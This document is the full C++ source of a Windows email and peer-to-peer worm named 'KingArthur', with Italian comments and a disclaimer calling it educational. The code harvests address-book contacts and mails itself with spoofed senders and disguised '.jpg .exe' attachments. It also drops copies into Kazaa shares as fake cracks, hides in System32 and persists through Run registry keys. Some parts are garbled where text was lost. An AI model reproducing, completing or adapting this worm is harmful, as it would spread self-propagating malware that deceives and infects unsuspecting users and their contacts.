//King.Arthur // #######################################-Disclaimer Legale-############################# // Tutto il materiale qui presente è stato scritto a puro scopo didattico, l'autore non // si assume nessuna responsabilità per le informazioni qui riportate e si pone come un // aperto contrastatore della diffusione di trojan. Questo materiale può essere divulgato, // modificato e chi vuole può pure metterci il prorpio nome, la gloria non fa per me! // ####################################################################################### //Compilato con Visual C++ //Queste le definizioni del preprocessore : WIN32,_DEBUG,WINDOWS //Queste quelle del linker: //kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib //shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib //kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib //shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib // /nologo /subsystem:windows /incremental:yes /pdb:"Debug/KingArthur.pdb" // /debug /machine:I386 /out:"Debug/KingArthur.exe" /pdbtype:sept #include #include #include #include #include #include #include #include //accedo alla windows process list #include //wab32.dll, per leggere l'address book di outlook //linking delle librerie richieste #pragma comment(lib,"wsock32.lib") #pragma comment(lib,"advapi32.lib") #pragma comment(lib,"shell32.lib") #pragma comment(lib,"user32.lib") #pragma comment(lib,"gdi32.lib") //destinazione degli encoded files #define BASE64DESTFILE "C:\\ntldr.sys" //timer di propagazione #define WORMTIMER 60 //secondi //**************************************************************************** //* //* area variabili globali //* //**************************************************************************** //debug mode on/off (visualizza i messaggi durante l'esecuzione...) boolean DBG=true; //windows handler HWND hwnd; //winsock usato per la connessione SOCKET sck; //definisco la variabile sck di tipo socket WORD version = MAKEWORD(1,1); WSADATA wsaData; SYSTEMTIME time; typedef HRESULT (WINAPI *fWABOpen)(LPADRBOOK*,LPWABOBJECT*,LPWAB_PARAM,DWORD); int nRet; //buffer di stringhe per le funzioni dell'SMTP char Buf[256],myBuf[2048],ch[1],ch2[256], server[256], email[256], helo[256]; char filename[MAX_PATH], winbkup[MAX_PATH], windows_dir[MAX_PATH], rcpt[MAX_PATH]; //buffer utilizzato per l'encoding routine BASE64 char cx[1],cx2[33],buc1[8],buc2[8],buc3[8],xxx[256]; int i,err=0,c=0,connected=0,tim,sending=0; double k; DWORD basesize,ProcessId; HINSTANCE hinstLib; //**************************************************************************** //* //* WndProc Callback Mette in comunicazione il sistema operativo con l'applicazione e specifica come l'applicazione deve rispondere ai vari eventi di Windows //* //**************************************************************************** LRESULT CALLBACK WndProc(HWND hWnd,UINT iMsg,WPARAM wParam,LPARAM lParam); //**************************************************************************** //* //* GetAsciiCode() //* Usata da EncodeBase64() //* //**************************************************************************** int GetAsciiCode(char chr[1]) { int i=0; char c[1]; for (i=0;i<257;i++) { c[0]=i; if (chr[0]==c[0]) return(i); } } //**************************************************************************** //* //* EncodeBase64() //* ::Utilizza l'encoding in "base 64" per l'attach delle mail //* //**************************************************************************** void EncodeBase64(char *file) { WIN32_FIND_DATA fis; int i,j,n,done=0,k=0,lin=0; double c=0; char tmp[7]; DWORD totsize; char base[64]={'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'}; //ottengo la dimensione del file espressa in bytes fstream f(file,ios::in | ios::binary), g(BASE64DESTFILE,ios::out); FindFirstFile(file,&fis); totsize=fis.nFileSizeLow; //faccio l'encode del file fino dividendolo in 3 parti for (c=0;cGetPAB( &lpcbEntryID, &lpEntryID ); _ASSERTE(hRes == S_OK); if (hRes != S_OK) exit(2); ULONG ulFlags = MAPI_BEST_ACCESS; ULONG ulObjType = NULL; LPUNKNOWN lpUnk = NULL; hRes = lpAdrBook->OpenEntry( lpcbEntryID, lpEntryID, NULL, ulFlags, &ulObjType, &lpUnk ); ulFlags = NULL; if (ulObjType == MAPI_ABCONT) { IABContainer *lpContainer = static_cast (lpUnk); LPMAPITABLE lpTable = NULL; hRes = lpContainer->GetContentsTable( ulFlags, &lpTable ); _ASSERT(lpTable); ULONG ulRows; hRes = lpTable->GetRowCount(0,&ulRows); _ASSERTE(hRes == S_OK); SRowSet *lpRows; hRes = lpTable->QueryRows( ulRows, //prendo tutte le righe nella WAB address book 0, &lpRows ); //genero un numero casuale SYSTEMTIME time; GetSystemTime(&time); srand(time.wSecond); rand(); //seleziono il numero casuale generato per estrarre un indirizzo e-mail dall'address book if(ulRows>0) { int r = int(ulRows * rand()/(RAND_MAX + 1.0)); SRow *lpRow = &lpRows->aRow[r]; for(ULONG j=0;jcValues;j++) { SPropValue *lpProp = &lpRow->lpProps[j]; if (lpProp->ulPropTag == PR_EMAIL_ADDRESS_A) strcpy(rcpt,lpProp->Value.lpszA); } lpWABObject->FreeBuffer(lpRow); } lpWABObject->FreeBuffer(lpRows); } } } } //**************************************************************************** //* //* SMTPEngine() //* ::Invio un messaggio di email con il protocollo SMTP; Il worm è un attach MIME //* //**************************************************************************** void SMTPEngine() { //inizializzo il numero casuale generato //per scegliere un subjects, un sender ed un filename a caso SYSTEMTIME time; GetSystemTime(&time); srand(time.wSecond); rand(); //ottengo un indirizzo e mail valido dalla WAB address book strcpy(rcpt,""); GetRandEmailAddr(); if(strlen(rcpt)>5) { //"HELO" SMTP server strcpy(myBuf, "HELO <"); strcat(myBuf,helo); strcat(myBuf,">\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); recv(sck,Buf,sizeof(Buf),0); //MAIL FROM if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0') { strcpy(myBuf, "MAIL FROM: <"); strcat(myBuf,email); strcat(myBuf,">\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); if(DBG) MessageBox(hwnd,myBuf,"DEBUG - SMTPEngine()",MB_OK); recv(sck,Buf,sizeof(Buf),0); } if (Buf[0]=='4' || Buf[0]=='5') err=1; //RCPT TO if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0' && err==0) { strcpy(myBuf, "RCPT TO: <"); strcat(myBuf, rcpt); strcat(myBuf, ">\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); if(DBG) MessageBox(hwnd,myBuf,"DEBUG - SMTPEngine()",MB_OK); recv(sck,Buf,sizeof(Buf),0); } if (Buf[0]=='4' || Buf[0]=='5') err=1; //DATA if (Buf[0]=='2' && Buf[1]=='5' && err==0) { strcpy(myBuf, "DATA\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); recv(sck,Buf,sizeof(Buf),0); } if (Buf[0]=='4' || Buf[0]=='5') err=1; //MAIL BODY if (Buf[0]=='3' && Buf[1]=='5' && Buf[2]=='4' && err==0) { strcpy(myBuf, "Message-ID: <00d601c3fa5e$479cbc30$0400000@domain.com>\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); //sceglie un sender a caso int r = int(3 * rand()/(RAND_MAX + 1.0)); //usa un indirizzo MAIL DELIVERY SERVICE generico if(r==2) { strcpy(myBuf, "From: \"Mail Delivery Service\" \x0d\x0a"); } //usa un indirizzo reale per infettare l'host if(r==1) { strcpy(myBuf, "From: <"); strcat(myBuf, email); strcat(myBuf, ">\x0d\x0a"); } //usa "info@" address if(r==0) { strcpy(myBuf, "From: \"info\" \x0d\x0a"); } send(sck,myBuf,strlen(myBuf),0); //recipient strcpy(myBuf, "To: <"); strcat(myBuf, rcpt); strcat(myBuf, ">\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); //sceglie un soggetto a caso if(r==2) strcpy(myBuf, "Subject: Delivery Status Notification\x0d\x0a"); if(r==1) strcpy(myBuf, "Subject: RE: image\x0d\x0a"); if(r==0) strcpy(myBuf, "Subject: Account Information Request\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); strcpy(myBuf, "MIME-Version: 1.0\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); strcpy(myBuf, "Content-Type: multipart/mixed; boundary=\"NextPart_25462232\"\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); strcpy(myBuf, "X-Priority: 3\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); strcpy(myBuf, "X-MSMail-Priority: Normal\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); strcpy(myBuf, "X-Mailer: Microsoft Outlook Express 6.00.2800.1158\x0d\x0a\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); strcpy(myBuf, "This is a multi-part message in MIME format.\x0d\x0a\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); //corpo del messaggio strcpy(myBuf, "--NextPart_25462232\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); strcpy(myBuf, "Content-Type: text/plain; charset=us-ascii\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); strcpy(myBuf, "Content-Transfer-Encoding: 7bit\x0d\x0a\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); if(r==2) strcpy(myBuf, "This recipient of your message has \x0d\x0a not been processed by the mail server: - Failed (5.7.0);\x0d\x0a"); if(r==1) strcpy(myBuf, "This picture was taken \x0d\x0a with my new phone, look it!\x0d\x0a"); if(r==0) strcpy(myBuf, "You can read this document \x0d\x0a using Microsoft Word\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); //spoof del tipo di attach strcpy(myBuf, "--NextPart_25462232\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); //spoof dell'attach di tipo zip if(r==2) { strcpy(myBuf,"Subject:msg067.zip .exe\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); strcpy(myBuf,"Content-Type: application/x-zip-compressed\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); } //spoof dell'attach di tipo jpg if(r==1) { strcpy(myBuf,"Subject:img042.jpg .exe\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); strcpy(myBuf,"Content-Type: image/jpeg\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); } //spoof dell'attach di tipo MS-WORD if(r==0) { strcpy(myBuf,"Subject:doc004.doc .exe\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); strcpy(myBuf,"Content-Type: application/msword\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); } strcpy(myBuf, "Content-Transfer-Encoding: base64\x0d\x0a\x0d\x0a"); send(sck,myBuf,strlen(myBuf),0); //invio il file byte x byte fstream f(BASE64DESTFILE,ios::in); for (k=0;kdwSize = sizeof(MODULEENTRY32); // Walk the module list of the process, and find the module of // interest. Then copy the information to the buffer pointed // to by lpMe32 so that it can be returned to the caller. Module32First(hModuleSnap, lpMe32); CloseHandle (hModuleSnap); return (1); } //**************************************************************************** //* //* GetWormExecutionPath() //* ::Ottengo la path dell'eseguibile //* //**************************************************************************** bool GetWormExecutionPath() { HANDLE hProcessSnap = NULL; BOOL bRet = FALSE; PROCESSENTRY32 pe32 = {0}; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hProcessSnap == (HANDLE)-1) return (FALSE); pe32.dwSize = sizeof(PROCESSENTRY32); if (Process32First(hProcessSnap, &pe32)) { DWORD dwPriorityClass; BOOL bGotModule = FALSE; MODULEENTRY32 me32 = {0}; //loop nella Windows Process list fino a chè il processID viene trovato //prendo il nome del file do { bGotModule = GetProcessModule(pe32.th32ProcessID, pe32.th32ModuleID, &me32, sizeof(MODULEENTRY32)); if (bGotModule) { if (me32.th32ProcessID==ProcessId) strcpy(filename,me32.szExePath); } } while (Process32Next(hProcessSnap, &pe32)); bRet = TRUE; } else bRet = FALSE; CloseHandle (hProcessSnap); return (bRet); } //**************************************************************************** //* //* ReadMailConf() //* ::Leggo la configurazione della mail dal registro di Windows (smtp server, sender account) //* //**************************************************************************** void ReadMailConf() { int i,j; char key2[256]; unsigned char acc[1024],smtp[1024],eml[1024]; DWORD acclen=sizeof(acc), smtplen=sizeof(smtp), emllen=sizeof(eml); HKEY hKey; //ottengo l'SMTP server dal registro strcpy(key2,"Software\\Microsoft\\Internet Account Manager"); RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey); RegQueryValueEx(hKey,"Default Mail Account",0,NULL,acc,&acclen); RegCloseKey(hKey); strcpy(key2,"Software\\Microsoft\\Internet Account Manager\\Accounts\\"); j=strlen(key2); for (i=0;i<8;i++){ key2[j+i]=acc[i]; } key2[j+i]=0; RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey); RegQueryValueEx(hKey,"SMTP Server",0,NULL,smtp,&smtplen); RegCloseKey(hKey); if (smtp[0]>44 && smtp[0]<123) { i=0; while (smtp[i]!=0) { server[i]=smtp[i]; //adesso questo è l'SMTP server i++; } server[i]=0; //ottengo l'e-mail RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey); RegQueryValueEx(hKey,"SMTP Email Address",0,NULL,eml,&emllen); RegCloseKey(hKey); if (eml[0]>44 && eml[0]<123) { i=0; while (eml[i]!=0) { email[i]=eml[i]; //adesso questo è il "FROM:" e-mail i++; } email[i]=0; } //setto un nuovo "HELO" domain i=strlen(email)-1; j=0; while (email[i]!='@') { helo[j]=email[i]; j++; i--; } } helo[j]=0; strrev(helo); //end } //**************************************************************************** //* //* TrySocketConn() //* ::Provo a connettermi con l'SMTP server e se avviene invio il worm x e-mail //* //**************************************************************************** int TrySocketConn(HWND hwnd) { ReadMailConf(); if(DBG) MessageBox(hwnd,server,"DEBUG - SMTP Server:",MB_OK); if(DBG) MessageBox(hwnd,email,"DEBUG - Sender e-mail:",MB_OK); if(DBG) MessageBox(hwnd,"Connecting to SMTP server...","DEBUG",MB_OK); //avvio il Winsock i=WSAStartup(version, &wsaData); if (i!=0) return(0); LPHOSTENT lpHostEntry; lpHostEntry = gethostbyname(server); if (lpHostEntry == NULL) { WSACleanup(); connected=0; return(0); } else connected=1; //ciò significa che siamo connessi //creo il socket sck = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (sck == INVALID_SOCKET) { WSACleanup(); connected=0; return(0); } SOCKADDR_IN saServer; saServer.sin_family = AF_INET; saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list); saServer.sin_port = htons(25); // Connessione al server nRet = connect(sck,(LPSOCKADDR)&saServer,sizeof(struct sockaddr)); if (nRet == SOCKET_ERROR) { WSACleanup(); connected=0; return(0); } nRet = recv(sck,Buf,sizeof(Buf),0); if (nRet == SOCKET_ERROR) { WSACleanup(); connected=0; return(0); } if (Buf[0]=='4' || Buf[0]=='5') err=1; if (Buf[0]=='2' && Buf[1]=='2' && Buf[2]=='0') { if(DBG) MessageBox(hwnd,"Sending worm mail","DEBUG",MB_OK); err=0; sending=1; SMTPEngine(); sending=0; } //chiudo la connessione closesocket(sck); //shutdown Winsock WSACleanup(); } //**************************************************************************** //* //* InfectP2P() //* ::Propaga il worm tramite Kazaa con un nomr file a caso //* //**************************************************************************** void InfectP2P(char *file) { int i; char kaza[256]=""; char kfile[7][50]; unsigned char kpth[1024]; DWORD kpthlen=sizeof(kpth); HKEY hKey; //fake-filenames usato dal worm strcpy(kfile[0],"\\DVDDecrypter3160.exe\x00"); strcpy(kfile[1],"\\nero6keygen.exe\x00"); strcpy(kfile[2],"\\WinXPcrack.exe\x00"); strcpy(kfile[3],"\\OfficeXPcrack.exe\x00"); strcpy(kfile[4],"\\DivX512Bundle.exe\x00"); strcpy(kfile[5],"\\Winrar30keygen.exe\x00"); strcpy(kfile[6],"\\Keygen.exe\x00"); //ottengo la transfer directory di Kazaa dal registry RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Kazaa\\Transfer",0,KEY_QUERY_VALUE,&hKey); RegQueryValueEx(hKey,"DlDir0",0,NULL,kpth,&kpthlen); RegCloseKey(hKey); if (kpth[0]>64 && kpth[0]<123) { i=0; while (kpth[i]!=0) { kaza[i]=kpth[i]; i++; } } //scelgo un filename a caso GetSystemTime(&time); srand(time.wSecond); rand(); int r = int(6 * rand()/(RAND_MAX + 1.0)); strcat(kaza,kfile[r]); //copio il file infettato nella directory share di Kazaa if(DBG) MessageBox(hwnd,kaza,"DEBUG - Kazaa Infected File",MB_OK); CopyFile(file,kaza,FALSE); } //**************************************************************************** //* //* InfectWin() //* ::Installo il worm nella Windows folder e nel Registry //* //**************************************************************************** void InfectWin(char *file) { HKEY HKrun; unsigned char val[256]; char rnd[6]; int i=0; //leggo la directory di windows strcpy(winbkup,windows_dir); //seleziono a caso un nome per il file worm GetSystemTime(&time); srand(time.wSecond); rand(); int r = int(4 * rand()/(RAND_MAX + 1.0)); if(r==3) strcat(winbkup,"\\System32\\lsa.exe"); if(r==2) strcat(winbkup,"\\System32\\srvhost.exe"); if(r==1) strcat(winbkup,"\\System32\\userini.exe"); if(r==0) strcat(winbkup,"\\System32\\regsvr16.exe"); //copio il file worm nella directory windows\system32 CopyFile(file,winbkup,TRUE); while (winbkup[i]!=0) { val[i]=winbkup[i]; i++; } val[i]=0; //seleziono a caso una chiave di registro per lo startup del worm if (rand()%2==0) { RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&HKrun); RegSetValueEx(HKrun,"svchost",0,REG_SZ,val,sizeof(val)); RegCloseKey(HKrun); } else { RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows",&HKrun); RegSetValueEx(HKrun,"load",0,REG_SZ,val,sizeof(val)); RegCloseKey(HKrun); } } //**************************************************************************** //* //* TimerProc() //* ::procedura timer viene chiamata ogni volta che uso la variabile WORMTIMER //* //**************************************************************************** void CALLBACK TimerProc(HWND hwnd,UINT uMsg,UINT idEvent,DWORD dwTime) { if(DBG) MessageBox(hwnd,"Cyclic Worm Routine...","DEBUG",MB_OK); if (sending==0) { //Controllo che la posta non sia in delivery status TrySocketConn(hwnd); } } //**************************************************************************** //* //* PayLoad() //* ::Ad una determinata data scateno questo codice //* //**************************************************************************** void PayLoad() { MessageBox(NULL,"KingArthur is active on this computer","Warning!",MB_OK+MB_SYSTEMMODAL); } //**************************************************************************** //* //* WinMain() //* //**************************************************************************** int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInst,LPSTR lpCmdLine,int nShowCmd){ WNDCLASSEX wndc; MSG msg; HKEY HKinfmark; unsigned char buf[1024],inf[]="yes"; //marco l'infezione nel registry DWORD buflen=sizeof(buf); //creo una standard window per l'applicazione wndc.cbClsExtra = 0; wndc.cbSize = sizeof(wndc); wndc.cbWndExtra = 0; wndc.hbrBackground = (HBRUSH)GetStockObject(BLACK_BRUSH); wndc.hCursor = LoadCursor(NULL,IDC_ARROW); wndc.hIcon = LoadIcon(NULL,IDI_APPLICATION); wndc.hIconSm = LoadIcon(NULL,IDI_APPLICATION); wndc.hInstance = hInstance; wndc.lpfnWndProc = WndProc; wndc.lpszClassName = "ClassName"; wndc.lpszMenuName = NULL; wndc.style = CS_HREDRAW|CS_VREDRAW; RegisterClassEx(&wndc); hwnd =CreateWindow("ClassName","Windows",WS_POPUPWINDOW,0,0,1024,1024,NULL,NULL,hInstance,NULL); UpdateWindow(hwnd); //nascondo la finestra ShowWindow(hwnd,SW_HIDE); if(DBG) MessageBox(hwnd,"Worm Window created and hidden","DEBUG",MB_OK); //controllo il time corrente per l'attivazione della funzione di payload if(DBG) MessageBox(hwnd,"Payload Activation Check","DEBUG",MB_OK); GetSystemTime(&time); if (time.wMonth==7) //se il mese è Luglio PayLoad(); else { //ottengo il nome per l'eseguibile del worm GetWindowThreadProcessId(hwnd,&ProcessId); GetWormExecutionPath(); if(DBG) MessageBox(hwnd,filename,"DEBUG - Get Worm Process Path",MB_OK); //ottengo la windows dir GetWindowsDirectory (windows_dir, sizeof (windows_dir)); //faccio l'encode del worm in base64 e lo metto nel BASE64DESTFILE EncodeBase64(filename); if(DBG) MessageBox(hwnd,BASE64DESTFILE,"DEBUG - Encode worm to base64 file",MB_OK); //controllo se il worm è già presente nel computer RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\KingArthur",0,KEY_QUERY_VALUE,&HKinfmark); RegQueryValueEx(HKinfmark,"Inf",0,NULL,buf,&buflen); RegCloseKey(HKinfmark); //ottengo la directoy %ProgramFiles% e //la collego alla path di WAB32.DLL char progdir[MAX_PATH]; GetEnvironmentVariable ("ProgramFiles", progdir, MAX_PATH); strcat(progdir,"\\Common Files\\System\\wab32"); if(DBG) MessageBox(hwnd,progdir,"DEBUG - Get WAB.DLL Dir",MB_OK); hinstLib = LoadLibrary(progdir); //se questa è la prima infezione, contrassegno questo computer come infetto //usando la chiave di registro HKLM\Microsoft\Inf //infetto il computer e il peer to peer if (buf[0]!='y' || buf[1]!='e' || buf[2]!='s') { if(DBG) MessageBox(hwnd,"Infection Mark not Found in registry","DEBUG",MB_OK); //creo una chiave di registro per contrassegnare il pc come infetto RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\KingArthur",&HKinfmark); RegSetValueEx(HKinfmark,"Inf",0,REG_SZ,inf,sizeof(inf)); RegCloseKey(HKinfmark); InfectWin(filename); InfectP2P(filename); //messaggio fasullo dopo l'esecuzione del worm MessageBox(hwnd,"EXPLORER.EXE has performed an illegal operation","Error",MB_OK+MB_ICONSTOP); } //sono residente e faccio girare la routine worm per l'infezione ogni WORMTIMER secondi if(DBG) MessageBox(hwnd,"Stay resident with a cyclic timer","DEBUG",MB_OK); SetTimer(hwnd,tim,WORMTIMER*1000,TimerProc); } while(GetMessage(&msg,NULL,0,0)) { TranslateMessage(&msg); DispatchMessage(&msg); } FreeLibrary(hinstLib); return msg.wParam; } //**************************************************************************** //* //* WndProc callback function //* //**************************************************************************** LRESULT CALLBACK WndProc(HWND hwnd,UINT iMsg,WPARAM wParam,LPARAM lParam) { HDC hdc; PAINTSTRUCT ps; switch(iMsg){ case WM_PAINT: hdc = BeginPaint(hwnd,&ps); EndPaint(hwnd,&ps); return 0; case WM_DESTROY: PostQuitMessage(0); return 0; } return DefWindowProc(hwnd,iMsg,wParam,lParam); }